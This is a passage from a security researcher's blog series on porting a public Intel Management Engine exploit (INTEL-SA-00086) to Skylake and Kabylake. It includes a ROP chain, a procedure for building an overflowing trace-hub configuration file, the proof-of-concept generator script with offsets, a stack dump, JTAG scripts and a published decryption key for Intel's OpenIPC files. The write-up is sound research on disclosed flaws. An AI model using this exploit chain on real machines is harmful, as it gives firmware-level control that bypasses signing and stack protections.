  int consent = get_segment_dword(0x10F, 4); // Read 32 bits from 0x10F:4
  set_segment_dword(0x10f, 4, consent | 1); // Write to 0x10F:4
}

Well, that's easy, if we want to write to the DfX aggregator, we don't necessarily need to write to the sideband port directly, we can just write to the MMIO in segment 0x10F and it should do the work for us. Note that MMIO is simply mapped to the DfX-Agg device via the sideband, and I think that I had found the Sideband Port ID by looking at how the sideband mappings for the MMIO ranges get setup.

Back to ROP

So, now back to our ROP, all we would need to do, is to call this function using a ROP set_segment_dword(0x10F, 0, 3) that should be easy!

To find which ROPs we can use, and find the gadgets we want, we can use this very useful tool called Ropper. Using Ropper, I was able to search for the address of the pop esp; ret and the jmp $ instruction for the infinite loop as well as anything else I might need. I end up with this little ROP :


    # Write dfx personality = 0x3
    rops += rop(0x11B9)			# set_selector_dword
    rops += rop(0x44EA3) 		# infinite_loop
    rops += rop(0x10F)	 		# param 1 - selector
    rops += rop(0)			# param 2 - offset
    rops += rop(0x3)			# param 3 - value
    

Once that's done, I can give it a try, and... yes, yes, that's it, it worked, even though you can't really know it yet because I have no way of actually debugging the ME because the Intel IPC framework that Intel System Studio provides, does not (obviously) support the ME core in its JTAG configuration. I'll get to that in a minute, but yes, that is enough to get it working.

I have later improved the ROPs to actually write the original syslib context to the TLS structure, then reset the stack to what it should be so the init scripts can continue executing and the main finish its thing, so that after the exploit runs, I can still turn on the computer (the same as PT did with the CPU Bringup changes for TXE).

In summary :

  • Find the Stack address and Syslib context address from the first call in the BUP entry function.
  • Follow all the push/pop/call/ret to build a map of what the stack should look like
  • Find the offset of the CT data in the stack
  • Find the address of the return address of the memcpy call
  • Build your CT file so you have :
    • ROPs to set RED level to the DfX-Aggregator and restore the stack
    • Syslib context pointing to shared memory descriptors
    • Shared memory descriptors (Don't forget, your buffer size needs to be your file size + 0x40 since you have one extra chunk at the end, and your address needs to be the target_address - offset)
    • TLS data pointing to the custom syslib context
    • Extra chunk at the end of the file that has the ROP with pop esp; ret and the pointer to your actual ROP data at the start of the file.
  • Add your custom CT file to the MFS partition using MFSUtil, making sure it aligns with end of chunks and does not use sequential chunks in the chain

I've uploaded my script to generate the CT file for ME 11 in a fork of PT's TXE POC repository. It has the offsets and ROPs for both Skylake (ME 11.0.18.1002) and Kabylake (ME 11.6.0.1126). It is currently in the me11 branch. I don't know if that branch gets deleted eventually and it goes into master, or it gets merged upstream officially (it's not TXE anymore, so maybe not?), regardless, here's the repository : https://github.com/kakaroto/IntelTXE-PoC/

OpenIPC

OpenIPC is the last step of this adventure! It's a Python library and tool and I don't know what else, but it's basically what we use to communicate with the ME on the machine. Positive Technologies repository explains well how to find the decryption key for the OpenIPC configuration files and how to decrypt them.

The second step is to apply a patch to the configuration files to add support for the ME.

The problem is that on Apollolake, the configuration file has every JTAG TAP (Test-Access Port) defined while the Skylake definition is empty (well, it only supports actual CPU cores but none of the other internal devices).

Figuring out the XML format of those files, how they are used, how JTAG itself works and everything else is a lesson for another day (probably never because I was in a daze trying to figure it out and I mostly banged on my keyboard like a monkey until something worked, then I erased all that knowledge from my brain because I was disgusted).

The way that JTAG works (more or less) is that you have a topology/hierarchy, you have a device that has children, and those children can have their own children, and if you don't know the full path to a device, you can't talk to it. If you make a mistake in the 'index' of those children in the path, then you'll be talking to something else. Thankfully, it's not very strict, so you can just say "the 3rd child of the 2nd child of the 4th child" and you don't need to specify what each of those in the link are, so if you make a mistake, or if the first device only has 1 child, then you'll just be talking to "the wrong child of the wrong child of the wrong child" rather than be unable to communicate. At least, I think that's how it works... I'm not entirely sure that's how it works and I entirely don't care, what's important though is that you don't need to say "I want to talk to device with ID x", instead you say "I want to talk to device 3->2->4" and then you ask it for its ID.

That topology is defined in an XML file, and I wrote a script that generated an XML file that basically brute forces every possibility. So for each device, I define 8 subdevices and for each of those subdevices, I define 8 other subdevices, up to a depth of 4 or I don't even remember how many. So after spending days trying to figure this out, I just wrote this script :

def genTaps(max, depth=0, max_depth=1, parent="SPT_TAP"):
    res = ""
    for i in xrange(0, max, 2):
        name = "%s_%s" % (parent, i)
        res += ('  ' * depth + '<Tap Name="%s" IrLen="8" IdcodeIr="0x0C"  VerifyProc="verify_idcode()" SerializeProc="common.tap.add_tap(0x11,%s,%s)" DeserializeProc="common.tap.remove_tap(0x11,%s,%s)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()" InsertBeforeParent="false">\n' % (name, i, max, i, max))
        if depth + 1 < max_depth:
            res += genTaps(max, depth + 1, max_depth, name)
        res += ('  ' * depth + '</Tap>\n')
    return res
    # ProductInfo.xml needs this line added :
    # <TapInfo TapName="SPT_TAP.*" NodeType="Box" Stepping="$(Stepping)" AddInstanceNameSuffix="false"/>
    # Or whatever parent/prefix you use for the initial call set in TapName

Then I called it and generated a new OpenIPC/Data/Xml/SPT/TapNetworks.LP.xml file, added a line in the ProductInfo.xml file to tell it that there is a 'Box' node with all those TAP devices, then I ran OpenIPC again. Yeay, it accepts the config file (after the Nth attempt of course, let's ignore that...)!

The tap networks file is now 500KB and has this huge topology of about 3000 devices, most of which did not exist and would yield in an error when OpenIPC tries to scan their idcode, and would therefore not add them to the final device list (thinking they are just powered off), but once it's done, it should technically list every device that is actually available on the JTAG chain.

Finally, I run this little code in the IPC python console :

def displayValidIdcodes(prefix=""):
    for d in ipc.devs:
        if d.name.startswith(prefix):
            idcode = d.idcode()
            proc_id = d.irdrscan(0x2, 32)
            if proc_id != 0:
                idcode += " (" + proc_id.ToHex() + ")"
            print("%s : %s" % (d.name, idcode))

While looking at all the configuration files from various platforms and trying to understand the schema, I noticed that the core processors have two ID codes. The first one using the IR (Instruction Register I think?) scan code 0xC let every other device, which gives us the actual Idcode of the device, but using the IR scan code 0x2, it gives us the 'processor type' or something like that..

Once I run the above script, it gives me the list of all devices (just one) that have a non zero processor ID, and that reveals the CSME core! With that, I know its position in the topology, and I can clean up the xml file to leave only that device and give it a proper name and the proper configuration so I can debug into it, etc...


      <Tap Name="SPT_RGNLEFT" IrLen="8" Idcode="0x02080003" IdcodeIr="0x0C" SerializeProc="common.soc.add_tap(0x11, 2, 16)" DeserializeProc="common.soc.remove_tap(0x11, 2, 16)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()" InsertBeforeParent="false">
	<Tap Name="SPT_PARCSMEA" IrLen="8" Idcode="0x2086103" IdcodeIr="0x0C" SerializeProc="common.soc.add_tap(0x11, 2, 14)" DeserializeProc="common.soc.remove_tap(0x11, 2, 14)" AdjustProc="common.tap.read_idcode_and_remove_if_zero()"  InsertBeforeParent="false">
	  <Tap Name="SPT_CSME_TAP" Idcode="0x08086101" IrLen="8" IdcodeIr="0x0C"  SerializeProc="common.soc.add_tap(0x11, 2, 14)" DeserializeProc="common.soc.remove_tap(0x11, 2, 14)" InsertBeforeParent="false"/>
          <Tap Name="SPT_PARCSMEA_RETIME" IrLen="8" Idcode="0x0008610B" IdcodeIr="0x0C" VerifyProc="verify_idcode()" SerializeProc="common.soc.add_tap(0x11, 12, 14)" DeserializeProc="common.soc.remove_tap(0x11, 12, 14)" InsertBeforeParent="false"/>
        </Tap>
      </Tap>

Oh by the way, this is on OpenIPC_1.1917.3733.100 and the decryption key is 1245caa98aefede38f3b2dcfc93dabfd so we can just decrypt the OpenIPC files with :

python config_decryptor.py -k 1245caa98aefede38f3b2dcfc93dabfd -p C:\Intel\OpenIPC_1.1917.3733.100

It would probably be a different version of OpenIPC if you use the latest version of Intel System Studio (I believe I had version 2019.4) and therefore a different decryption key. You can find your own easily using the instructions that PT have released along with their POC repository.

There is one final problem that still needs to be resolved. Whenever I open OpenIPC with the machine turned on, it will fail because of some conflict in the configuration between the ME core and main CPU, so I have to connect to the machine before I power it on, connect with OpenIPC, then turn the machine on, and it works. I'm sure that some smart people can figure out the right XML configuration that would allow me to debug both the ME and the CPU cores at the same time, but I don't really need that so I didn't waste any of my time trying to achieve that. Note that the TXE PoC for Apollolake suffers from the same problem and the patches to OpenIPC that PT released remove the CPU cores to prevent that conflict from happening.

Regardless, the diff for the config files is added to my repository IntelTXE-PoC fork, and just make sure you launch OpenIPC before powering on the main CPU and you should be fine.

And that's it! Congratulations, you can now debug the ME 11.x on a Skylake or Kabylake machine!

CSME debugged on Skylake

That's the end of the story for today. Next time, I'll tell you about how I wrote a quick USB controller for the CSE and how I made the CSME disrupt the USB and SATA controllers while the OS was booted, making all USB/SATA drives become inaccessible!

While in this post, you saw the release of the MFSUtil project and the ME 11.x port of the IntelTXE PoC, in the next one (either tomorrow or Friday), I'll release a lot of the tools and scripts I used to work with JTAG, so you can do more easily poke at the ME processor without fighting against the limitation of the OpenIPC library.

Thank you and you and you

Update: In my rush to post this yesterday (I had been writing this post for about 8 hours and it was 4AM), I forgot to add the little thank you to all those who helped me throughout this journey. Of course, Mark Ermolov and Maxim Goryachy from Positive Technologies for laying down most of the ground work and being helpful by answering all my questions, Dmitry Sklyarov for figuring out the MFS partition format and documenting it for the rest of us, as well as Peter Bosch who gave useful advice and helped me understand the sideband channel a bit better, David Barksdale who gave me the trick to finding the stack address from that first function in the bup code, as well probably some others to whom I apologize for not remembering them right now (it has been a long time...).

Again, thanks for reading! 🙂

Exploiting Intel’s Management Engine – Part 1: Understanding PT’s TXE PoC (INTEL-SA-00086)

Let me tell you a story…. (I think I’ll start all my blog posts with that considering how long they always end up being)

I’ve been working for a while now on trying to reproduce the Intel vulnerability that PT Research has disclosed at BlackHat Europe 2017 and I’ve succeeded and wanted to share my journey and experience with everyone, in the hope that it helps others take control of their machines (and not the other way around).

First, for those who are unaware, Positive Technologies (referred to here as ‘PT Research‘, ‘PT Security‘ or just ‘PT‘), have released information at BlackHat 2017 about a way to run unsigned code on the Intel Management Engine. And for those who are unaware, the Intel ME is a ‘security’ processor that runs on every Intel chip (since 2006) and that supposedly has full access to our systems. You can read more about it here and here, but the description that I’ve read and that stuck the most with me is this one from Libreboot’s FAQ (though it is a little outdated).

What’s the Intel Management Engine ?

In summary, the ME (Management Engine) is a second processor embedded in every PCH (the motherboard’s chipset) which runs with the highest privilege possible, it runs its own Intel-signed firmware, and takes care of a lot of things that you don’t know it does, the mainly known one being AMT (Intel Active Management Technologies) which allows a system administrator to remote access, control, update, reformat, KVM, etc.. a computer through the network, and that’s even if the computer is turned off. It’s called “out of bands” management, because it doesn’t work with a software running on the main CPU (like teamviewer/skype remote desktop or anything like that), but it works even if your entire OS is corrupted, or has a virus, or the machine is actually turned off.

That’s pretty scary, and if you’re wondering why Intel did this, well the rationale is that when you’re a system administrator in a company that has thousands of computers, or a university or even a small business with a dozen computers, and you want to update them all to a newer security update or whatever, then you can do it all at once from the comfort of your chair, and you don’t need to go through the entire building, and insert a USB key into each machine, and turn on those machines that were powered off, etc.. The real question however is why, for consumers, is the option to disable the ME not available ? As a regular user, I don’t need that ability to remotely control my machine, so I want to disable it, but I can’t. This has led to a lot of FUD (Fear, Uncertainty & Doubt) surrounding the ME as a way for Intel to control the world!

Image result for evil meme"
Intel CEO

I wanted to figure out what was truth and was wasn’t as I dug deep into reverse engineering and poking at the ME. The ME does have a legitimate function, but it does so much more now, as it takes care of the hardware initialization, the main CPU boot up, control of the clock registers, DRM management for Audio/Video, software based TPM and more. Those extra tasks are supposedly why it cannot be deactivated for consumer products. It unfortunately also means that you have to trust that Intel isn’t doing anything malicious (or allowing others to do something malicious by their incompetence). It’s not that I think Intel are malicious, but that doesn’t mean I trust them implicitly either. I’ve started to look into the ME, trying to get my code to execute on it, using the exploit PT had divulged and I took on the mission of getting the ME to control and spy on my USB devices. This started when I was still working with Purism, but even after I left that company, I continued working on this, on and off, for a little over a year now and I’ve finally made enough progress that I think it warrants writing something about it. Especially since I’ve ‘revived’ this blog in the last month with a couple of posts about reverse engineering too.

First things first. The Intel Management Engine (IME) or Management Engine (ME) is also called the CSME (Converged Security and Management Engine) or just CSE (Converged Security Engine) and sometimes called TXE (Trusted eXecution Engine) or SPS (Server Platform Services) and it used to be called Intel Management BIOS Extension (IMEBx).. It can get quite confusing.. especially considering that “the ME” can refer both to the Management Engine processor core itself and the Management Engine firmware which are both often indistinguishable of each other. I haven’t looked at the IMEBx (it’s old) or the SPS (don’t care about servers), but I think we can safely say that the ‘CSE’ and ‘CSME’ are the hardware cores, and the ‘TXE’ and ‘ME’ are their firmwares, respectively. I’m not sure if it’s exactly true, as I’ve heard ‘CSME’ also refer to the firmware, not just the hardware, but mostly all of these terms are interchangeable and I’ve seen Intel documents used them interchangeably as well.

I can also say with fair certainty that the CSE and CSME are both the same thing, they are the same hardware as far as I can see, and their firmware is pretty much the same. The CSE is used for ‘low power/cheap’ platforms, such as Celeron/Apollolake for example (set-top boxes, netbooks, cheap and underpowered laptops, etc..), while CSME is used for ‘desktop/laptop’ high end CPUs such as Skylake, Kabylake, CoffeLake, etc… The main difference between the two is that CSE doesn’t include the AMT (remote administration feature) while CSME does include it. The CSE runs the TXE firmware which is the exact same as the ME firmware, but again without the AMT features. I obviously can’t try to run the ME firmware on an Apollolake with the CSE because each version will only work for one platform (hardware initialization/registers being specific per platform), but looking at their code, I can say that they are pretty much identical, one does more than the other, but it’s the same code, same base architecture/functioning. TXE/CSE is probably just cheaper for Intel because there are less features for them to test/QA before release.

In this post, I will be talking about both the CSE and CSME, because PT Research has released their exploit so we can run our own code on the Apollolake platform (running TXE on CSE) and what I’ve done is both play with that and also port it to work on the Skylake platform (running ME on CSME).

Understanding the CSE exploit in order to do the CSME exploit

The first thing I want to explain is how to run your own code on the CSE (TXE v3.0). This will be pretty long, so I think I’ll divide this article into 3 posts, one that I will try to write each day. First, understanding the CSE exploit, then porting the exploit to CSME, then how to play around with the USB controller through the ME.

You can already refer to Positive Technologies’ presentation given by Mark Ermolov and Maxim Goryachy at BlackHat Eruope 2017. You can download their slides here and presentation here. It explains everything (mostly) of what you need to do. Then you can have a look at their Proof of Concept release of the exploit on github for Apollolake systems.

Before you go further, this post isn’t going to be like my previous posts that try to explain things on a very basic level (and often fail at remaining basic the further along you read). This is going to get very technical very fast, and before you continue, you need to read and understand the exploit as explained in the presentation by PT linked above. If you can’t follow it, then you’re just going to get lost, as I am assuming that you’ve read it and understood it all.

Here’s a quick summary of the exploit PT have divulged in their presentation :

  • The ME firmware consists of multiple ‘partitions’, one of them being the ‘MFS’ partition (ME File System) which contains various configuration files.
  • While most partitions are signed and cannot be modified as they contain code, the MFS partition is not and can therefore be modified by us mortals. There are additional restrictions in it that makes not all of the files user-modifiable.
  • A file in the MFS partition named "/home/bup/ct" is used to initiatize the Trace Hub Configuration of the ME and is user-modifiable.
  • The ME process BUP (Hardware Bring-UP) reads the entire "/home/bup/ct" file into a buffer of size 808 without checking that the file will fit : we have a buffer overflow exploit here.
  • There is a security-cookie/stack-guard that protects the ME against buffer overflows, making the buffer overflow exploit useless.
  • At the very bottom of the stack (the first 0x18 bytes of the stack) resides the TLS structure (Thread Local Storage) which contains a pointer to the syslib context.
  • The "/home/bup/ct" file is read in chunks of 64 bytes, and copied into a shared memory block
  • Writing to the shared memory block (with sys_write_shared_mem function) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure
  • Overwriting the stack all the way to the bottom in order to overwrite the syslib context, pointing it to a custom-made shared memory block which has the destination address pointing to the memcpy‘s return address lets us control where we want the function to return, thus bypassing the security-cookie/stack-guard protection that is in place
  • By using both the buffer overflow exploit and the TLS/syslib-context/shared-memory exploit, we can control the code that gets executed using ROPs : running our own unsigned code.

Using another presentation from Positive Technologies, this time at the 34th Chaos Communication Congress, we can see that the Intel chipsets support JTAG which allows full debugging capabilities. In order to be able to JTAG the ME core itself, we would need to have ‘RED’ level unlock. See this little helpful table, taken from yet another Positive Technologies presentation (BlackHat Asia 2019)

All we need to enable RED unlock is to set value 3 to the DfX Aggregator register. Pretty easy to do once we have our own code running on the ME, so we can create a ROP chain that can be used to enable DCI and Red Unlock mode and allows us full ME JTAG control by another PC over USB.

Something you might not realize at first (and I didn’t until I dug deep) is that the exploit explained in the BlackHat Europe 2017 presentation is very different from what they’ve released as their proof of concept. The buffer overflow in reading the “/home/bup/ct" file is the same, but that’s the easy part (hard to find, but easy to use : write a file with a size more than 808 bytes). I don’t know why, don’t ask, and I haven’t asked them either, but they decided to release the proof of concept for Apollolake (TXE 3.x) rather than for Skylake (ME 11.x) even though their presentation was about how to exploit it on Skylake. I figured that if I wanted to port their exploit to skylake, I needed to first understand how it works on Apollolake then it should just be a matter of finding the right offsets for my version of the ME on Skylake, right?… No. It actually took me a long time to figure out that what they are doing is a different exploit. In their presentation they were talking about how they overwrite the TLS with the syslib context in order to take over the shared memory destination address so they can control the memcpy for overwriting their function’s return address and bypass the stack guard security cookie .

The problem with that method is that it requires two read, the first one is to overwrite the TLS/syslib context, and the second one to cause the memcpy operation that lets the exploit happen. On skylake, it’s not a problem, the "/home/bup/ct" file gets read in chunks of 64 bytes, so you overwrite the syslib context with one chunk then you overwrite your return address with the next chunk. On Apollolake unfortunately, it doesn’t seem to use chunked reads. Because it’s a simplified firmware, the MFS (ME File System) on the flash is different I assume, and the file is read in one shot. Which means that the exploit in the presentation cannot be used. So… what do they do ?

The TXE Exploit

If you follow their instructions in their IntelTXE-PoC repository, you’ll see that the entire TXE exploit is stored in the "/home/bup/ct" file (Trace Hub Configuration) which gets generated by the me_exp_bxtp.py script. That’s the file you generate and by configuring the ME using Intel’s tools, setting the CT file in the “Trace Hub Configuration” field, the exploit happens. But what does it do exactly? What’s in that file? The script that generates it has unfortunately a few magic numbers that took me a long time to figure out. Let’s look at them :

STACK_BASE = 0x00056000
BUFFER_OFFSET = 0x380
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
RET_ADDR_OFFSET = 0x338


def GenerateTHConfig():
    print("[*] Generating fake tracehub configuration...")
    trace_hub_config   = struct.pack("<B", 0x0)*6
    trace_hub_config  += struct.pack("<H", 0x2)
    trace_hub_config  += struct.pack("<L", 0x020000e0)
    trace_hub_config  += struct.pack("<L", 0x5f000000)
    trace_hub_config  += struct.pack("<L", 0x02000010)
    trace_hub_config  += struct.pack("<L", 0x00000888)

def GenerateRops():
    print("[*] Generating rops...")
    # Let's ignore this for now

def GenerateShellCode():
    syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
    data  = GenerateTHConfig()
    init_trace_len = len(data)
    data += GenerateRops()
    data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data))
    data += struct.pack("<L", 0x00016e1a) 
    data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)

    data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start,  0, 0x03000300, STACK_BASE-4)
    data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail))
    data += data_tail
    return data

I’ve ignored the ROPs, they’re not important for now, but if we look at the magic numbers, first, the STACK base address is 0x56000, cool, good to know.. where did they find it? no idea! Why is the buffer offset 0x380? What’s this 0x55c58 address that is SYS_TRACER_CTX_REQ_OFFSET ? Why is the RET_ADDR_OFFSET set to 0x338 ? And then all those magic values in the GenerateTHConfig function. At first, I thought that it was just a valid Trace Hub file and that if it didn’t start with those values, it would be rejected, but it turns out those values are important for the exploit to happen. Then that magic value 0x00016e1a that gets written on line 27 of the sample above.. what is that?

This article will answer all of those questions, as I’ve worked on reverse engineering the exploit itself. I will spare you all the reverse engineering and research I did on the ME itself in order to understand how the kernel creates its processes, how/where it sets up the stack, how the TLS structure gets created and by who (I wasted too much time looking at the kernel instead of just concentrating on the BUP process itself), I’ll look at that a little bit more in the next post.

After the exploit runs and I have a halted ME thread in the python console, I used the JTAG commands and dumped the stack to see what functions had run. I could follow every call that way and figured out what happened, who called who until the exploit was triggered. It’s probably a bit hard to read and I’m not going to try and explain it, but here’s the dump of the stack with my notes on the side showing what variables, registers and ret addresses are appearing on each line :

01bf:0000000000055950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055960: 00 00 00 00 cc 59 05 00 c8 59 05 00 18 00 00 00 -- garbage - push edi (in _memset_0)
01bf:0000000000055970: dc 18 00 00 40 30 09 00 ff ff ff ff 18 00 00 00 -- retaddr to _memset_0 - ebx (addr) - push 0xffffff (value) - push edi (length)
01bf:0000000000055980: 11 00 00 00 d1 01 00 00 22 00 00 00 b1 02 00 00 -- previously pushed ecx - ebx - esi - edi
01bf:0000000000055990: 04 5a 05 00 89 6d 00 00 04 30 09 00 d1 01 00 00 -- ebp 0x055a04 - retaddr to sub_1119 - var_54 - ebx
01bf:00000000000559a0: b0 02 00 00 3c 5a 05 00 d0 4d 02 00 70 5a 05 00 -- eax - LOCALS[0x54]
01bf:00000000000559b0: 04 30 09 00 44 90 09 00 d0 01 00 00 d2 02 00 00
01bf:00000000000559c0: 21 00 00 00 6f 03 00 00 ff 03 00 00 00 00 00 00
01bf:00000000000559d0: ff ff ff ff 00 00 00 00 84 30 09 00 84 30 09 00
01bf:00000000000559e0: 04 30 09 00 e1 00 00 00 02 01 00 00 91 00 00 00
01bf:00000000000559f0: d0 01 00 00 20 8e ff 6e 44 90 09 00 80 03 00 00 -- LOCALS[0x54] - ebx - esi
01bf:0000000000055a00: 00 30 09 00 50 5a 05 00 ee 6e 00 00 44 90 09 00 -- edi - ebp 0x055a50 - retaddr to sub_6CA2 - ebx
01bf:0000000000055a10: 04 30 09 00 00 04 00 00 00 4c 02 00 e0 00 00 00 -- ecx - eax - eax - eax
01bf:0000000000055a20: 01 00 00 00 70 5a 05 00 3c 5a 05 00 db f1 e8 6b -- eax - eax - eax - LOCALS[0x18]
01bf:0000000000055a30: 74 5a 05 00 40 5a 05 00 1d 84 01 00 03 00 00 00
01bf:0000000000055a40: 64 5a 05 00 ea 34 01 00 04 00 00 00 58 5a 05 00 -- LOCALS[0x18] - ebx - esi - ebp ** INVALID STACK ABOVE THIS POINT
01bf:0000000000055a50: bd 25 01 00 20 8e ff 6e 72 5a 05 00 00 00 00 00 -- retaddr to sys_get_ctx_struct_addr ** INVALID STACK ABOVE THIS POINT
01bf:0000000000055a60: d8 5a 05 00 a4 5a 05 00 4a 2a 01 00 72 5a 05 00 -- INVALID - ebp - retaddr to sub_134C6 - ebx
01bf:0000000000055a70: 20 00 43 02 00 02 08 00 0e 00 56 00 02 00 86 80 -- LOCALS[0x2C]
01bf:0000000000055a80: 80 03 00 00 04 00 00 00 94 5a 05 00 1d 84 01 00
01bf:0000000000055a90: 03 00 00 00 a0 5a 05 00 20 8e ff 6e 8c 5a 05 00 -- LOCALS[0x2C] - ebx
01bf:0000000000055aa0: 44 37 09 00 b8 5a 05 00 e5 2b 01 00 0e 00 56 00 -- esi - ebp - retaddr to sub_129C9 - arg0 ** INVALID STACK HERE AND ABOVE
01bf:0000000000055ab0: 04 00 00 00 c8 5a 05 00 10 6c 00 00 00 00 00 00 -- 4 - ebp 0x55aC8 sub_6A68 - retaddr to sub_6A50 - eax
01bf:0000000000055ac0: 0e 00 56 00 0e 00 00 00 f8 5a 05 00 62 84 00 00 -- X - X - ebp 0x55AF8 sub_8309 - retaddr to sub_6a68
01bf:0000000000055ad0: 80 03 00 00 00 8e ff 6e 8c 5a 05 00 80 03 00 00 -- LOCALS[0x1C]
01bf:0000000000055ae0: 44 37 09 00 28 5b 05 00 20 8e ff 6e 00 00 00 00 -- LOCALS[0x1C] - ebx 
01bf:0000000000055af0: 80 03 00 00 44 37 09 00 28 5b 05 00 2a 81 02 00 -- esi - edi - ebp 0x55B28 sub_2808E - retaddr to sub_6082
01bf:0000000000055b00: 44 37 09 00 00 03 00 00 00 00 00 00 29 9a 07 00 -- edi - LOCALS[0x18]
01bf:0000000000055b10: 80 03 00 00 44 37 09 00 20 8e ff 6e 80 03 00 00 -- LOCALS[0x18] - ebx
01bf:0000000000055b20: 29 8a 07 00 64 5c 05 00 90 5b 05 00 28 99 02 00 -- esi - edi - ebp 0x55B90 bup_read_mfs_file - retaddr to sub_2A678
01bf:0000000000055b30: 29 9a 07 00 80 03 00 00 02 00 00 00 00 03 00 00 -- a1 - src_size  (0x380) - sm_block_id (2) - proc_thread_id (0x300)
01bf:0000000000055b40: 00 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff -- proc_thread_id - a6, a7, a8
01bf:0000000000055b50: 00 00 00 00 01 00 00 00 00 00 00 00 68 5b 05 00 -- a9 - 10 - LOCALS[0x2C] - ebp 0x55b68 _get_tls_slot
01bf:0000000000055b60: 1d 84 01 00 03 00 00 00 8c 5b 05 00 ea 34 01 00 -- retaddr to get_tls_slot - arg0 (3), ebp 0x55b8c sub_134C6 - retaddr to sub_13495
01bf:0000000000055b70: 04 00 00 00 80 5b 05 00 bd 25 01 00 20 8e ff 6e -- X - ebp 0x55b80 sub_1253 - retaddr to sys_get_ctx_struct_addr - COOKIE ** INVALID
01bf:0000000000055b80: 9a 5b 05 00 00 00 00 00 04 00 00 00 cc 5b 05 00 -- LOCALS[0x2C] - ebx  - esi - ebp 0x55bcc sub_129C9
01bf:0000000000055b90: 4a 2a 01 00 9a 5b 05 00 ac 5b 43 02 00 02 08 00 -- retaddr to sub_134C6
01bf:0000000000055ba0: 01 00 56 00 02 00 86 80 64 5c 05 00 48 5c 05 00
01bf:0000000000055bb0: 81 13 03 00 02 00 00 00 5f 73 6b 75 00 65 00 00
01bf:0000000000055bc0: 20 8e ff 6e 58 5a 05 00 00 00 00 00 e0 5b 05 00 -- LOCALS --  - ebp 0x55BCC sub_12BD6 ** INVALID
01bf:0000000000055bd0: e5 2b 01 00 01 00 56 00 f4 5b 05 00 ae 6f 00 00 -- retaddr to sub_129C9 * INVALID - X - ebp 0x55bf4 sub_6F3D - retaddr 0x6fae to sub_6A50
01bf:0000000000055be0: 00 00 00 00 02 00 00 00 01 00 56 00 02 00 00 00 -- add esp, 0C - ebx
01bf:0000000000055bf0: 80 5c 05 00 24 5c 05 00 bc 7a 00 00 00 00 00 00 -- esi - ebp 0x55c24 sub_7A91 - retaddr 0x7abc to sub_6f3D
01bf:0000000000055c00: 00 00 00 00 00 00 00 00 00 00 e0 01 e4 9b 04 00
01bf:0000000000055c10: 00 00 00 00 20 8e ff 6e 02 00 00 00 80 5c 05 00
01bf:0000000000055c20: 04 00 05 00 40 5c 05 00 9c 7c 00 00 00 00 00 00 -- LOCAL - ebp 0x55c40 sub_7C88 - retaddr 0x7c9c to sub_7A91
01bf:0000000000055c30: 04 00 00 00 0a 00 05 00 00 00 00 00 e4 9b 04 00
01bf:0000000000055c40: 50 5c 05 00 5e 69 00 00 0a 00 05 00 e4 9b 04 00 -- ebp 0x55c50 sub_6950 - retaddr 0x695e to sub_7C88
01bf:0000000000055c50: b4 5f 05 00 e4 9b 04 00 0a 00 05 00 07 00 00 00 -- ebp 0x55fb4 - retaddr 0x49be4 to sub_6078
01bf:0000000000055c60: bf 00 00 00 80 03 00 00 07 00 00 00 4b 52 4f 44
01bf:0000000000055c70: 14 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055c80: 00 00 00 00 00 00 02 00 e0 00 00 02 00 00 00 5f
01bf:0000000000055c90: 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055d60: 00 00 00 00 15 a8 04 00 c7 00 00 00 18 10 00 00
01bf:0000000000055d70: 39 a8 04 00 c7 00 00 00 08 10 00 00 01 00 00 00
01bf:0000000000055d80: c7 00 00 00 1c 10 00 00 15 a8 04 00 c7 00 00 00
01bf:0000000000055d90: 18 10 00 00 39 a8 04 00 c7 00 00 00 08 10 00 00
01bf:0000000000055da0: 01 00 00 00 c7 00 00 00 1c 10 00 00 00 01 00 00
01bf:0000000000055db0: 00 00 00 00 9f 01 00 00 00 00 00 00 10 10 00 00
01bf:0000000000055dc0: 77 a8 04 00 c7 00 00 00 08 10 00 00 be 11 00 00
01bf:0000000000055dd0: 76 a8 04 00 9f 01 00 00 00 84 00 00 03 00 00 00
01bf:0000000000055de0: 2d a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
01bf:0000000000055e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
